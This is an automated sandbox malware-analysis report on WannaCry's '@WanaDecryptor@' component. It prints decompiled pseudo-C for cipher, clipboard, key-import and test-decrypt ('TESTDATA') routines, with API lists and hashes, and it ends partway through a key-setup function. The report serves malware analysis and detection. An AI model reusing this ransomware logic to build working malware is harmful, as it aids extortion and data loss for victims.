Function 0040B3C0 Relevance: 12.2, APIs: 8, Instructions: 203
COMMONCrypto

Download Yara Rule

C-Code - Quality: 65%

			E0040B3C0(void* __ebx, void* __ecx, void* __ebp, void* _a4, signed int _a8, signed int _a12, void* _a16) {
				void* _v4;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				struct HWND__* _v32;
				WCHAR* _v36;
				struct HWND__* _t90;
				signed int* _t100;
				signed int _t102;
				signed int _t105;
				signed int* _t109;
				signed int _t113;
				signed int _t114;
				signed int _t121;
				void* _t124;
				signed int _t130;
				signed int _t132;
				signed int _t138;
				signed int _t143;
				signed int _t152;
				signed int _t157;
				void* _t185;
				void* _t188;
				signed int* _t191;
				void* _t204;
				signed int _t206;
				struct HWND__* _t207;
				void* _t211;
				void* _t212;
				void* _t217;
				void* _t218;
				signed int _t221;
				void* _t224;
				signed int* _t226;
				void* _t227;
				void* _t228;

				_t228 = _t227 - 0xc;
				_t124 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
					_push(0x41c9c0);
					_push( &_v16);
					L004130FC();
				}
				_t206 = _a12;
				_t185 = 0;
				if(_t206 == 0) {
					L26:
					__imp__??0exception@@QAE@ABQBD@Z(0x4213ac);
					_push(0x41c9c0);
					_push( &_v16);
					L004130FC();
					_push(_t206);
					_t90 = FindWindowW(0, _v36); // executed
					_t207 = _t90;
					if(_t207 != 0) {
						_push(_t185);
						ShowWindow(_t207, 5);
						SetWindowPos(_t207, 0xffffffff, 0, 0, 0, 0, 0x43);
						SetWindowPos(_t207, 0xfffffffe, 0, 0, 0, 0, 0x43);
						SetForegroundWindow(_t207);
						SetFocus(_t207);
						SetActiveWindow(_t207);
						BringWindowToTop(_t207);
						_t90 = _v32;
						if(_t90 != 0) {
							ExitProcess(0);
						}
					}
					return _t90;
				} else {
					_t130 =  *(_t124 + 0x3cc);
					if(_t206 % _t130 != 0) {
						goto L26;
					} else {
						_t100 = _a16;
						if(_t100 != 1) {
							L13:
							_a16 = _t185;
							if(_t100 != 2) {
								L23:
								_t102 = _t206 / _t130;
								_t188 = _a4;
								_t221 = _a8;
								if(_t102 <= 0) {
									goto L11;
								} else {
									do {
										_push(_t221);
										_push(_t188);
										E0040B0C0(_t124);
										_t132 =  *(_t124 + 0x3cc);
										_t188 = _t188 + _t132;
										_t221 = _t221 + _t132;
										_a8 = _a8 + 1;
										_t105 = _t206 / _t132;
									} while (_a8 < _t105);
									return _t105;
								}
							} else {
								_t102 = _t206 / _t130;
								_t191 = _a8;
								_t224 = _a4;
								_a4 = _t191;
								if(_t102 <= 0) {
									goto L11;
								} else {
									while(1) {
										_t50 = _t124 + 0x3f0; // 0x444
										_push(_t191);
										E0040ADC0(_t124);
										_t109 = _t191;
										if( *((intOrPtr*)(_t124 + 4)) == 0) {
											break;
										}
										_t211 = 0;
										if( *(_t124 + 0x3cc) > 0) {
											do {
												 *_t109 =  *_t109 ^  *(_t211 + _t224);
												_t109 =  &(_t109[0]);
												_t211 = _t211 + 1;
											} while (_t211 <  *(_t124 + 0x3cc));
										}
										_t212 = _t224;
										_t56 = _t124 + 0x3f0; // 0x444
										_t138 =  *(_t124 + 0x3cc) >> 2;
										_t113 = memcpy(_t212 + _t138 + _t138, _t212, memcpy(_t56, _t212, _t138 << 2) & 0x00000003);
										_t228 = _t228 + 0x18;
										_t143 =  *(_t124 + 0x3cc);
										_t114 = _t113 / _t143;
										_t224 = _t224 + _t143;
										_v4 = _v4 + _t143;
										_t206 = _a8 + 1;
										_a8 = _t206;
										if(_t206 < _t114) {
											_t191 = _v4;
											continue;
										} else {
											return _t114;
										}
										goto L31;
									}
									__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
									_t130 =  &_v24;
									_push(0x41c9c0);
									_push(_t130);
									L004130FC();
									goto L23;
								}
							}
						} else {
							_t102 = _t206 / _t130;
							_t226 = _a8;
							_a16 = 0;
							if(_t102 <= 0) {
								L11:
								return _t102;
							} else {
								while(1) {
									_push(_t226);
									_push(_a4);
									E0040B0C0(_t124);
									_t100 = _t226;
									if( *((intOrPtr*)(_t124 + 4)) == 0) {
										break;
									}
									_t217 = 0;
									if( *(_t124 + 0x3cc) > 0) {
										_t22 = _t124 - _t226 + 0x3f0; // 0x444
										_t204 = _t22;
										do {
											 *_t100 =  *_t100 ^  *(_t204 + _t100);
											_t100 =  &(_t100[0]);
											_t217 = _t217 + 1;
										} while (_t217 <  *(_t124 + 0x3cc));
									}
									_t218 = _v4;
									_t27 = _t124 + 0x3f0; // 0x444
									_t152 =  *(_t124 + 0x3cc) >> 2;
									_t121 = memcpy(_t218 + _t152 + _t152, _t218, memcpy(_t27, _t218, _t152 << 2) & 0x00000003);
									_t228 = _t228 + 0x18;
									_t157 =  *(_t124 + 0x3cc);
									_t102 = _t121 / _t157;
									_t185 = _v4 + _t157;
									_t226 = _t226 + _t157;
									_t206 = _a8 + 1;
									_v4 = _t185;
									_a8 = _t206;
									if(_t206 < _t102) {
										continue;
									} else {
										goto L11;
									}
									goto L31;
								}
								__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
								_t130 =  &_v24;
								_push(0x41c9c0);
								_push(_t130);
								L004130FC();
								goto L13;
							}
						}
					}
				}
				L31:
			}

0x0040b3c0
0x0040b3c4
0x0040b3ce
0x0040b3d9
0x0040b3e3
0x0040b3e8
0x0040b3e9
0x0040b3e9
0x0040b3ee
0x0040b3f2
0x0040b3f6
0x0040b602
0x0040b60b
0x0040b615
0x0040b61a
0x0040b61b
0x0040b624
0x0040b628
0x0040b62e
0x0040b632
0x0040b634
0x0040b638
0x0040b651
0x0040b660
0x0040b663
0x0040b66a
0x0040b671
0x0040b678
0x0040b67e
0x0040b685
0x0040b689
0x0040b689
0x0040b685
0x0040b690
0x0040b3fc
0x0040b3fc
0x0040b40a
0x00000000
0x0040b410
0x0040b410
0x0040b417
0x0040b4ed
0x0040b4f0
0x0040b4f4
0x0040b5ba
0x0040b5be
0x0040b5c0
0x0040b5c4
0x0040b5ca
0x00000000
0x0040b5d0
0x0040b5d0
0x0040b5d0
0x0040b5d1
0x0040b5d4
0x0040b5d9
0x0040b5e3
0x0040b5e5
0x0040b5ea
0x0040b5f0
0x0040b5f2
0x0040b5ff
0x0040b5ff
0x0040b4fa
0x0040b4fe
0x0040b500
0x0040b504
0x0040b508
0x0040b50e
0x00000000
0x0040b510
0x0040b516
0x0040b516
0x0040b51c
0x0040b520
0x0040b528
0x0040b52c
0x00000000
0x00000000
0x0040b534
0x0040b538
0x0040b53a
0x0040b541
0x0040b549
0x0040b54a
0x0040b54b
0x0040b53a
0x0040b555
0x0040b559
0x0040b55f
0x0040b56f
0x0040b56f
0x0040b571
0x0040b57b
0x0040b57f
0x0040b581
0x0040b589
0x0040b58a
0x0040b590
0x0040b512
0x00000000
0x0040b592
0x0040b599
0x0040b599
0x00000000
0x0040b590
0x0040b5a5
0x0040b5ab
0x0040b5af
0x0040b5b4
0x0040b5b5
0x00000000
0x0040b5b5
0x0040b50e
0x0040b41d
0x0040b429
0x0040b42b
0x0040b42f
0x0040b435
0x0040b4c5
0x0040b4cc
0x0040b43b
0x0040b43b
0x0040b43f
0x0040b440
0x0040b443
0x0040b44b
0x0040b44f
0x00000000
0x00000000
0x0040b457
0x0040b45b
0x0040b461
0x0040b461
0x0040b467
0x0040b46e
0x0040b476
0x0040b477
0x0040b478
0x0040b467
0x0040b482
0x0040b488
0x0040b48e
0x0040b49e
0x0040b49e
0x0040b4a0
0x0040b4aa
0x0040b4b0
0x0040b4b2
0x0040b4b4
0x0040b4b5
0x0040b4b9
0x0040b4bf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b4bf
0x0040b4d8
0x0040b4de
0x0040b4e2
0x0040b4e7
0x0040b4e8
0x00000000
0x0040b4e8
0x0040b435
0x0040b417
0x0040b40a
0x00000000

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B3D9
_CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B3E9
??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B4D8
_CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B4E8
??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B5A5
_CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B5B5
??0exception@@QAE@ABQBD@Z.MSVCRT(004213AC), ref: 0040B60B
_CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B61B

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrow
String ID:
API String ID: 941485209-0
Opcode ID: 1e9378705d9ba196d58f13d3cc7227803daa0403281f32e8405f41cd2aefe311
Instruction ID: 0dbcc5357461fba905cfbac0272349747bc27b8ce320a87ccfe5983878451c5e
Opcode Fuzzy Hash: 1e9378705d9ba196d58f13d3cc7227803daa0403281f32e8405f41cd2aefe311
Instruction Fuzzy Hash: 7A61D5316043158BC705DE2998919ABB7E6FFC8704F04497EFC89BB345C738AA06CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00407C30 Relevance: 12.0, APIs: 8, Instructions: 48
clipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407C30(void* __ecx) {
				int _t9;
				void* _t15;
				void* _t22;
				signed int _t25;
				signed int _t26;
				void* _t39;
				void* _t40;

				_t39 = __ecx;
				_t9 = OpenClipboard( *(__ecx + 0x20));
				if(_t9 == 0) {
					return _t9;
				} else {
					_t22 = GlobalAlloc(2,  *((intOrPtr*)( *(_t39 + 0x508) - 8)) + 1);
					if(_t22 != 0) {
						EmptyClipboard();
						_t40 =  *(_t39 + 0x508);
						_t15 = GlobalLock(_t22);
						_t25 =  *((intOrPtr*)(_t40 - 8)) + 1;
						_t26 = _t25 >> 2;
						memcpy(_t15, _t40, _t26 << 2);
						memcpy(_t40 + _t26 + _t26, _t40, _t25 & 0x00000003);
						GlobalUnlock(_t22);
						SetClipboardData(1, _t22);
						return CloseClipboard();
					}
					return CloseClipboard();
				}
			}

0x00407c32
0x00407c38
0x00407c40
0x00407cab
0x00407c42
0x00407c55
0x00407c59
0x00407c66
0x00407c6c
0x00407c79
0x00407c7f
0x00407c86
0x00407c89
0x00407c90
0x00407c92
0x00407c9b
0x00000000
0x00407ca8
0x00407c63
0x00407c63

APIs

OpenClipboard.USER32(?), ref: 00407C38
GlobalAlloc.KERNEL32(00000002,?), ref: 00407C4F
CloseClipboard.USER32 ref: 00407C5B
EmptyClipboard.USER32 ref: 00407C66
GlobalLock.KERNEL32(00000000), ref: 00407C79
GlobalUnlock.KERNEL32(00000000), ref: 00407C92
SetClipboardData.USER32(00000001,00000000), ref: 00407C9B
CloseClipboard.USER32 ref: 00407CA1

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$Close$AllocDataEmptyLockOpenUnlock
String ID:
API String ID: 142981918-0
Opcode ID: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
Instruction ID: 8252ba06fde5d142781bbccc432981ef86be9671d894a3679d09edf034c0945c
Opcode Fuzzy Hash: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
Instruction Fuzzy Hash: 1D014B71740A05DFD714ABA5EC8DAFBB7A9FB88356B908079F54AC3350CF61AC048B64

Uniqueness

Uniqueness Score: -1.00%

Function 004047C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 154
encryptionstringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E004047C0(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
				long* _v8;
				char _v20;
				void _v539;
				char _v540;
				char _v543;
				char _v544;
				intOrPtr _v548;
				char _v552;
				int _v556;
				intOrPtr _v560;
				void* __ebx;
				char _t38;
				void* _t45;
				void* _t48;
				intOrPtr _t63;
				intOrPtr _t67;
				signed int _t76;
				unsigned int _t78;
				signed int _t79;
				long* _t85;
				char _t92;
				void* _t116;
				intOrPtr _t118;
				void* _t120;
				void* _t121;

				_push(0xffffffff);
				_push(0x415e38);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t118;
				_t63 = __ecx;
				_v560 = __ecx;
				_t38 = "TESTDATA"; // 0x54534554
				_v552 = _t38;
				_t67 =  *0x420c64; // 0x41544144
				_v548 = _t67;
				_t92 =  *0x420c68; // 0x0
				_v544 = _t92;
				_v543 = 0;
				_v540 = 0;
				memset( &_v539, 0, 0x7f << 2);
				_t120 = _t118 - 0x21c + 0xc;
				asm("stosw");
				asm("stosb");
				asm("repne scasb");
				_v556 = 0xbadbac;
				if(E004046B0(_t63) == 0) {
					L6:
					 *[fs:0x0] = _v20;
					return 0;
				} else {
					_v8 = 0;
					_t45 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 8, _a4);
					_t121 = _t120 + 0xc;
					if(_t45 == 0) {
						L12:
						_push(0xffffffff);
						_push( &_v20);
						goto L5;
					} else {
						_t76 = _a8;
						_t48 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 0xc, _t76);
						_t121 = _t121 + 0xc;
						if(_t48 == 0) {
							goto L12;
						} else {
							asm("repne scasb");
							_t78 =  !(_t76 | 0xffffffff);
							_t116 =  &_v552 - _t78;
							_t79 = _t78 >> 2;
							memcpy(_t116 + _t79 + _t79, _t116, memcpy( &_v540, _t116, _t79 << 2) & 0x00000003);
							_t121 = _t121 + 0x18;
							_push(0x200);
							_push( &_v556);
							_push( &_v540);
							_push(0);
							_push(1);
							_push(0);
							_push( *((intOrPtr*)(_t63 + 8)));
							if( *0x4217cc() != 0) {
								_t85 =  *(_t63 + 0xc);
								if(CryptDecrypt(_t85, 0, 1, 0,  &_v540,  &_v556) != 0) {
									asm("repne scasb");
									if(strncmp( &_v540,  &_v552,  !(_t85 | 0xffffffff) - 1) != 0) {
										_v8 = 0xffffffff;
										E004049A6(_t63);
										goto L6;
									} else {
										_push(0xffffffff);
										_push( &_v20);
										L00413056();
										 *[fs:0x0] = _v20;
										return 1;
									}
								} else {
									_push(0xffffffff);
									_push( &_v20);
									goto L5;
								}
							} else {
								_push(0xffffffff);
								_push( &_v20);
								L5:
								L00413056();
								goto L6;
							}
						}
					}
				}
			}

0x004047c3
0x004047c5
0x004047ca
0x004047d5
0x004047d6
0x004047e6
0x004047e8
0x004047ee
0x004047f3
0x004047f9
0x004047ff
0x00404805
0x0040480b
0x00404811
0x00404818
0x0040482c
0x0040482c
0x0040482e
0x00404830
0x0040483c
0x00404841
0x00404850
0x004048f3
0x004048f8
0x00404905
0x00404856
0x00404856
0x00404869
0x0040486e
0x00404873
0x00404995
0x00404995
0x0040499a
0x00000000
0x00404879
0x0040487c
0x00404885
0x0040488a
0x0040488f
0x00000000
0x00404895
0x004048a6
0x004048a8
0x004048ae
0x004048b2
0x004048bc
0x004048bc
0x004048be
0x004048c9
0x004048d0
0x004048d1
0x004048d3
0x004048d5
0x004048da
0x004048e3
0x0040491c
0x00404928
0x0040493d
0x0040495c
0x00404984
0x0040498b
0x00000000
0x0040495e
0x0040495e
0x00404963
0x00404964
0x00404974
0x00404981
0x00404981
0x0040492a
0x0040492a
0x0040492f
0x00000000
0x0040492f
0x004048e5
0x004048e5
0x004048ea
0x004048eb
0x004048eb
0x00000000
0x004048f0
0x004048e3
0x0040488f
0x00404873

APIs

Part of subcall function 004046B0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD

Part of subcall function 004049B0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
Part of subcall function 004049B0: GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404AC7

CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
_local_unwind2.MSVCRT ref: 004048EB
CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?), ref: 00404920
strncmp.MSVCRT(00000000,?), ref: 00404951
_local_unwind2.MSVCRT ref: 00404964

Strings

TESTDATA, xrefs: 004047EE

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: Crypt_local_unwind2$File$AcquireContextCreateDecryptEncryptSizestrncmp
String ID: TESTDATA
API String ID: 154225373-1607903762
Opcode ID: 20c9666a7ffcf9d4be304aa18a7e829ae4cc28ed87e3f3fd2989e324c574ec42
Instruction ID: 12943b98363484da7d263465f98eb3331ab271d68fc45af0c4cd497e7be75c93
Opcode Fuzzy Hash: 20c9666a7ffcf9d4be304aa18a7e829ae4cc28ed87e3f3fd2989e324c574ec42
Instruction Fuzzy Hash: 21512DB6600218ABCB24CB64DC45BEBB7B4FB98320F10477DF915A72C1EB749A44CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004049B0 Relevance: 10.6, APIs: 7, Instructions: 107
fileCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E004049B0(long* _a4, HCRYPTKEY* _a8, CHAR* _a12) {
				int _v8;
				char _v20;
				long _v32;
				int _v36;
				long _v40;
				void* _v44;
				long _t24;
				int _t28;
				BYTE* _t35;
				void* _t46;
				long _t51;
				intOrPtr _t53;

				_push(0xffffffff);
				_push(0x415e48);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t53;
				_v44 = 0xffffffff;
				_v32 = 0;
				_v36 = 0;
				_v8 = 0;
				_t46 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
				_v44 = _t46;
				if(_t46 == 0xffffffff) {
					L10:
					_push(0xffffffff);
					goto L11;
				} else {
					_t24 = GetFileSize(_t46, 0);
					_t51 = _t24;
					_v40 = _t51;
					if(_t51 != 0xffffffff) {
						if(_t51 <= 0x19000) {
							_t35 = GlobalAlloc(0, _t51);
							_v36 = _t35;
							if(_t35 == 0) {
								goto L10;
							} else {
								if(ReadFile(_t46, _t35, _t51,  &_v32, 0) != 0) {
									_t28 = CryptImportKey(_a4, _t35, _v32, 0, 0, _a8);
									_push(0xffffffff);
									if(_t28 == 0) {
										L11:
										_push( &_v20);
										goto L12;
									} else {
										_push( &_v20);
										L00413056();
										 *[fs:0x0] = _v20;
										return 1;
									}
								} else {
									_push(0xffffffff);
									_push( &_v20);
									goto L12;
								}
							}
						} else {
							_push(0xffffffff);
							_push( &_v20);
							goto L12;
						}
					} else {
						_push(_t24);
						_push( &_v20);
						L12:
						L00413056();
						 *[fs:0x0] = _v20;
						return 0;
					}
				}
			}

0x004049b3
0x004049b5
0x004049ba
0x004049c5
0x004049c6
0x004049d3
0x004049dc
0x004049df
0x004049e2
0x004049fb
0x004049fd
0x00404a03
0x00404ac1
0x00404ac1
0x00000000
0x00404a09
0x00404a0b
0x00404a11
0x00404a13
0x00404a19
0x00404a2b
0x00404a40
0x00404a42
0x00404a47
0x00000000
0x00404a49
0x00404a5a
0x00404a75
0x00404a7d
0x00404a7f
0x00404ac3
0x00404ac6
0x00000000
0x00404a81
0x00404a84
0x00404a85
0x00404a95
0x00404aa2
0x00404aa2
0x00404a5c
0x00404a5c
0x00404a61
0x00000000
0x00404a61
0x00404a5a
0x00404a2d
0x00404a2d
0x00404a32
0x00000000
0x00404a32
0x00404a1b
0x00404a1b
0x00404a1f
0x00404ac7
0x00404ac7
0x00404ad4
0x00404ae1
0x00404ae1
0x00404a19

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
_local_unwind2.MSVCRT ref: 00404AC7

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: File$CreateSize_local_unwind2
String ID:
API String ID: 1039228802-0
Opcode ID: 90535d59a0f2dbe90f1bf53ea38d3d76a54ffae39caaa8181d17ff2389417ade
Instruction ID: 027920ce5e1762b5ae47f20262b5a931ea28e629a989eecbafe96ff87ad0b853
Opcode Fuzzy Hash: 90535d59a0f2dbe90f1bf53ea38d3d76a54ffae39caaa8181d17ff2389417ade
Instruction Fuzzy Hash: 723153B1A40219BBDB10DF98DC84FFFB6ACE789771F14472AF525A22C0D33859018B68

Uniqueness

Uniqueness Score: -1.00%

Function 00406C20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00406C20(void* __ecx) {
				void _v51;
				void* _v52;
				signed int _t14;
				void* _t26;
				char* _t30;
				unsigned int _t36;
				signed int _t37;
				void* _t55;

				_t26 = __ecx;
				_v52 = 0;
				memset( &_v51, 0, 0xc << 2);
				asm("stosb");
				_t14 = GetUserDefaultLangID();
				_t30 =  &_v52;
				if(GetLocaleInfoA(_t14 & 0x0000ffff, 0x1001, _t30, 0x32) == 0) {
					asm("repne scasb");
					_t36 =  !(_t30 | 0xffffffff);
					_t55 = "English" - _t36;
					_t37 = _t36 >> 2;
					memcpy(_t55 + _t37 + _t37, _t55, memcpy( &_v52, _t55, _t37 << 2) & 0x00000003);
				}
				if(SendMessageA( *(_t26 + 0x80), 0x158, 0,  &_v52) != 0xffffffff) {
					SendMessageA( *(_t26 + 0x80), 0x14d, 0,  &_v52);
					return E00406AE0(_t26);
				} else {
					SendMessageA( *(_t26 + 0x80), 0x14e, 0, 0);
					return E00406AE0(_t26);
				}
			}

0x00406c25
0x00406c33
0x00406c38
0x00406c3a
0x00406c3b
0x00406c41
0x00406c5b
0x00406c65
0x00406c67
0x00406c71
0x00406c75
0x00406c7f
0x00406c7f
0x00406c9f
0x00406cd4
0x00406ce3
0x00406ca1
0x00406cb1
0x00406cc0
0x00406cc0

APIs

GetUserDefaultLangID.KERNEL32 ref: 00406C3B
GetLocaleInfoA.KERNEL32(00000000,00001001,00000000,00000032), ref: 00406C53
SendMessageA.USER32(?,00000158,00000000,00000000), ref: 00406C9A
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00406CB1
SendMessageA.USER32(?,0000014D,00000000,00000000), ref: 00406CD4

Part of subcall function 00406AE0: #540.MFC42(?,755720C0), ref: 00406B03
Part of subcall function 00406AE0: #3874.MFC42 ref: 00406B1B
Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B29
Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406B59
Part of subcall function 00406AE0: #800.MFC42(?,?,755720C0), ref: 00406B62
Part of subcall function 00406AE0: #800.MFC42 ref: 00406B73
Part of subcall function 00406AE0: GetFileAttributesA.KERNEL32(?), ref: 00406B7D
Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B91
Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406BBB
Part of subcall function 00406AE0: #800.MFC42(?,?,?,?,?,755720C0), ref: 00406BC4
Part of subcall function 00406AE0: #800.MFC42 ref: 00406BD5
Part of subcall function 00406AE0: #800.MFC42(?), ref: 00406BF5

Strings

English, xrefs: 00406C5D

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #800$MessageSend$#537#924sprintf$#3874#540AttributesDefaultFileInfoLangLocaleUser
String ID: English
API String ID: 600832625-3812506524
Opcode ID: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
Instruction ID: 12cb8a10269d81aa60d086da51d7e65d8080bc449a50ca3d57c6290c1d86febe
Opcode Fuzzy Hash: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
Instruction Fuzzy Hash: F911D3717402006BEB149634DC42BAB7795EBD4720F54863EFE5AEB2D0D9F8A8098794

Uniqueness

Uniqueness Score: -1.00%

Function 0040A150 Relevance: 9.4, APIs: 6, Instructions: 375
COMMONCrypto

Download Yara Rule

C-Code - Quality: 60%

			E0040A150(void* __ecx) {
				void* _t170;
				void* _t177;
				unsigned int _t178;
				intOrPtr _t182;
				signed int _t189;
				signed int _t190;
				signed int _t192;
				signed int* _t198;
				signed int* _t203;
				signed int _t214;
				signed int* _t215;
				signed int _t224;
				void* _t236;
				unsigned int _t238;
				signed int _t239;
				signed int _t245;
				signed int _t251;
				void* _t268;
				void* _t275;
				signed int _t276;
				void* _t278;
				signed int _t290;
				int _t292;
				signed int _t293;
				signed int _t317;
				signed int _t321;
				signed int _t337;
				signed int _t353;
				signed int _t355;
				intOrPtr* _t375;
				signed int _t378;
				void* _t385;
				void* _t386;
				void* _t387;
				signed int _t388;
				signed int* _t390;
				void* _t391;
				void* _t392;
				signed int _t395;
				signed int* _t397;
				intOrPtr _t398;
				void* _t399;
				void* _t403;

				_t236 = __ecx;
				if( *((intOrPtr*)(_t399 + 4)) == 0) {
					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
					_push(0x41c9c0);
					_push(_t399 + 8);
					L004130FC();
				}
				_t170 =  *(_t399 + 0x20);
				if(_t170 != 0x10 && _t170 != 0x18 && _t170 != 0x20) {
					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
					_t170 = _t399 + 8;
					_push(0x41c9c0);
					_push(_t170);
					L004130FC();
				}
				_t238 =  *(_t399 + 0x24);
				if(_t238 != 0x10 && _t238 != 0x18 && _t238 != 0x20) {
					 *((intOrPtr*)(_t399 + 0x18)) = 0x4213b4;
					_t238 = _t399 + 0xc;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
					_push(0x41c9c0);
					_push(_t399 + 8);
					L004130FC();
				}
				 *(_t236 + 0x3c8) = _t170;
				 *(_t236 + 0x3cc) = _t238;
				_t290 = _t238;
				_t385 =  *(_t399 + 0x20);
				_t19 = _t236 + 0x3d0; // 0x424
				_t239 = _t238 >> 2;
				memcpy(_t19, _t385, _t239 << 2);
				_t386 = memcpy(_t385 + _t239 + _t239, _t385, _t290 & 0x00000003);
